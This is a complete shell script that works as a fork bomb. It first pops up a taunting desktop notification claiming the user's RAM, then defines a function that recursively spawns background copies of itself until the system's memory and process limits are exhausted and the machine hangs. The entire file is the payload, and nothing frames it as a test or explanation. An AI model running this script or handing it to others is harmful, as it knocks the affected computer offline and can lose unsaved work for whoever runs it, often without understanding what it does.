#!/bin/sh
notify-send "Hippity hoppity" "Your RAM is now my property"
a () {
    sleep 1
    a &
    a
}
a
